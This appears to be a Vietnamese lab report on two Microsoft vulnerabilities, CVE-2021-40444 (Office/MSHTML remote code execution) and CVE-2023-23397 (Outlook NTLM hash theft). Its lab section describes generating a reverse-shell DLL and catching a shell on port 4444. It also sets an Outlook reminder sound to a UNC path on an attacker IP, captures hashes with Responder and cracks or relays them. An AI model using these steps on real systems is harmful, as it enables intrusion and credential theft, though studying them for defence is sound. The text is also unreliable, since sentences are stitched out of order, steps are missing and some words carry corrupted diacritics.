CVE-2021-40444 & CVE-2023-23397
MỤC LỤC
CƠ SỞ LÝ THUYẾT
- Giới thiệu về RCE (Remote Code Execution)
- Giới thiệu về leo thang đặc quyền (privilege escalation/ elevation of privilege)
Các tác động đa chiều của RCE, đặc biệt là tác động của nó đối với Microsoft Office - bộ ứng dụng phổ biến mà nếu bị khai thác thành công có thể gây ra những hậu quả nghiêm trọng, bao gồm việc đe dọa đến dữ liệu nhạy cảm, truy cập trái phép và hủy hoại danh tiếng. Leo thang đặc quyền dọc (Vertical privilege escalation): còn gọi là độ cao đặc quyền, trong đó người dùng hoặc ứng dụng đặc quyền thấp hơn truy cập vào các chức năng hoặc nội dung dành cho người dùng hoặc ứng dụng có đặc quyền cao hơn (ví dụ: người dùng Internet Banking có chức năng quản trị hệ thống và sửa đổi cơ sở dữ liệu).Với các đặc quyền nâng cao này, kẻ tấn công có thể phá hủy tất cả các tài nguyên trong hệ thống máy tính và ứng dụng nạn nhân: đánh cắp, truy cập thông tin nhạy cảm, tải xuống và thực thi phần mềm độc hại, xóa dữ liệu hoặc thực thi mã tùy ý. - Giám sát hoạt động của người dùng: Giám sát hoạt động của người dùng để phát hiện hành vi đáng ngờ có thể cho thấy tài khoản đặc quyền đã bị xâm phạm, theo dừi những thay đổi đột ngột trong kiểu hành vi của người dựng hoặc các hoạt động bất thường của quản trị viên hệ thống.
CVE-2021-40444 và CVE-2023-23397
Giới thiệu về CVE-2021-40444
Tại thời điểm phát hiện xảy ra cuộc tấn công, đây là một lỗ hổng zero-day, hoàn toàn mới và chưa từng bị khai thác, tin tặc thông qua các tài liệu Office chiếm quyền điều khiển của hệ thống. Đối với những người dùng sử dụng Microsoft Office chạy trên cấu hình mặc định, tài liệu được mở trong chế độ bảo vệ Protected View (hoặc Application Guard dành cho Office 365), cuộc tấn công ngược lại sẽ bị chặn. Tuy nhiên, theo như chuyên gia phân tích lỗ hổng của Trung tâm Ứng cứu khẩn cấp không gian mạng CERT/CC Will Dormann khẳng định rằng, cơ chế bảo vệ có sẵn chống lại CVE-2021-40444 này có khả năng bị vượt qua nếu người dùng bỏ qua cảnh báo của Protected View hoặc tin tặc gửi qua máy nạn nhân những tệp độc hại được nén bằng trình lưu trữ 7Zip hoặc ISO.
Lỗ hổng này nằm trong CISA Known Exploited Vulnerabilities Catalog – danh mục exploits in the wild (lỗ hổng dễ dàng được tìm thấy trên thiết bị thực của người dùng thông thường). Kỹ thuật tấn công này nguy hiểm hơn macros bởi bất cứ tổ chức nào vô hiệu hóa hoặc giới hạn thực thi Macro vẫn sẽ bị dính lỗi thực thi mã tùy ý này từ kết quả của việc mở một tài liệu Office. Các OLE objects là một phần của công nghệ Nhúng và Liên kết Đối tượng độc quyền của Microsoft, cho phép các tài liệu bên ngoài, chẳng hạn như bảng tính Excel, được nhúng vào trong tài liệu Word.
Kiểm tra máy chủ hoặc bắt các gói tin có thể thấy máy của nạn nhận đang thực hiện gửi các yêu cầu get head đến máy tấn công, với mục đích là lấy thông tin từ các file word.html và word.cab để thực hiện hành động tấn công của mình. Sau khi giải mã thu được một tệp script, qua mã code giả định được rằng kẻ tấn công đã tạo một phần tử iframe, truy xuất giao diện tập lệnh ActiveX cho iframe và phá hủy iframe đó. Để kích hoạt payload INF độc hại của mình, kẻ tấn công sử dụng extension như một giao thức URL đồng thời tìm kiếm tệp msword.inf, khiến control.exe khởi động rundll32.exe, chuyển tệp dạng INF thành một item điều khiển có thể thực thi.
Mã thực thi sẽ cố gắng tìm tệp msword.inf để tiến hành công việc được giao, bằng cách sử dụng kỹ thuật directory traversal và tìm đường dẫn bằng control.exe để thực thi file độc hại.
Giới thiệu về CVE-2023-23397
Còn các phiên bản khác của Microsoft Outlook như Android, iOS, Mac, cũng như Outlook khác không bị ảnh hưởng vì các ứng dụng này không hỗ trợ xác thực NTLM. Kẻ tấn công có thể từ chối hoàn toàn các yêu cầu truy nhập đến tài nguyên của thành phần bị dính lỗi; hệ quả này sẽ duy trì trong suốt quá trình tấn công hoặc cả khi cuộc tấn công đã kết thúc. Trong outlook khi setup một meeting mới để gửi cho tài khoản khác, ta có thể đặt tên tệp của trình nhắc nhở (reminder) phát ở phía người nhận bằng cách chỉnh sửa thuộc tính PidLidReminderFileParameter.
Vì vậy, khi kẻ tấn công gửi một cuộc hẹn có đường dẫn trỏ đến giao thức SMB và tất nhiên nạn nhân cũng sẽ được nhắc về cuộc hẹn, Outlook trong máy nạn nhân bị tấn công sẽ cố gắng tìm nạp âm báo của reminder và trong quá trình đó, nó sẽ cố gắng thực hiện xác thực NTLM. Trong đó máy nạn nhân sẽ gửi username và hash của NLTMv2 vào địa chỉ mà kẻ tấn công kiểm soát để xác thực quyền sử dụng tài nguyên, từ đó mã hash sẽ vô tình bị đánh cắp. Outlook sẽ tìm kiếm giá trị cho PidLidReminderFileParameter, theo như mô tả từ microsoft, thuộc tính này sẽ chỉ định tên tập tin âm thanh reminder khi thời gian nhắc nhở quá hạn.
Điều nguy hiểm ở đây là không những kẻ tấn công có thể sử dụng SMB để đánh cắp NLTM hash thông qua UNC path (port 445), mà chúng có thể chuyển hướng sang WebDAV. Nó thường được sử dụng để quản lý và truy cập vào các tệp trên máy chủ từ xa như là một hình thức của việc lưu trữ đám mây, cũng như cho phép các ứng dụng làm việc với tệp và dữ liệu trực tuyến qua mạng.
THỰC NGHIỆM
Khai thác lỗ hổng CVE-2021-40444
Bước 2: Tạo một file tên là payload.dll reverse shell và gán địa chỉ ip của máy tấn công cùng với cổng lắng nghe để kết nối. Bước 3: Sử dụng chế độ generate trong file exploit.py của mẫu mã độc thực hiện nén file tạo tài liệu độc hại. Sau khi nén xong sẽ tạo ra 2 file nén file định dạng .docx thì được lưu ở out để gửi cho máy tấn công.
Còn tệp cab sẽ được lưu ở máy tấn công để thực hiện gửi dữ liệu độc hại sau này. Khi máy mục tiêu thực hiện mở tài liệu document.docx màn hình word hiện ra và ngay lúc này payload đã được thực thi. Khi payload được thực thi máy mục tiêu sẽ tạo kết nối đến máy chủ của kẻ tấn công và thực hiện các yêu cầu lấy tài nguyên độc hại từ máy chủ đó.
Sau khi tạo kết nối và lấy thành công dữ liệu ngay lập tức ta nhận được shell trả về trên cổng 4444 và thành công RCE máy mục tiêu. Khai thác thành công lỗ hổng CVE-2021-40444, kẻ tấn công có thể lấy được các tệp, thư mục chứa dữ liệu nhạy cảm, chiếm quyền điều khiển hệ thống máy nạn nhân.
Khai thác lỗ hổng CVE-2023-23397
Kịch bản: kẻ tấn công sẽ tạo một appointment thông qua outlook và mời nạn nhân vào meeting độc hại đó, kể cả nạn nhân có đồng ý hay không, lời mời có tài nguyên lấy từ SMB server do kẻ tấn công kiểm soát, từ đấy đánh cắp thông tin xác thực của nạn nhân. Vì có một số phiên bản của outlook đã check file valid và tắt tính năng lập trình bằng ngôn ngữ vbs nên ở đây chúng ta sử dụng một công cụ thay thế là outlookspy để có thể chỉnh sửa. - AppointmentItem.ReminderSoundFile = \\192.168.211.150\hackkkk.abc Các lệnh này sẽ cho phép outlook ghi đè lên âm báo nhắc nhở của reminder khi quá hạn, sound file sẽ là đường dẫn UNC trỏ tới tập tin của SMB server với mục đích ép nạn nhân phải xác thực với SMB server để lấy tài nguyên (tệp tin sound file không cần phải tồn tại).
Để lắng nghe các kết nối xác thực, ta sẽ dùng responder, với lệnh responder -I ens33 và sử dụng cả wireshark để lắng nghe quá trình trao đổi. Nạn nhân không cần làm gì cả, chỉ cần ngồi đợi có một mail đến với lời mời và lịch hẹn nhảy lên. Sử dụng hashcat có thể lấy được mật khẩu, hoặc có thể sử dụng kỹ thuật pass the hash để chuyển tiếp mã băm xác thực với các dịch vụ cùng sử dụng NTLMv2 giống như SMB.
Thực nghiệm mô tả thành công lỗ hổng bảo mật có định danh cve-2023- 23397, lấy cắp thụng tin xỏc thực và khụi phụ bản rừ của mật khẩu từ hàm băm sử dụng hashcat. Lỗ hổng này cực kì nghiêm trọng và rất dễ bị khai thác, nên khuyến cáo cập nhật bản vá càng sớm càng tốt.
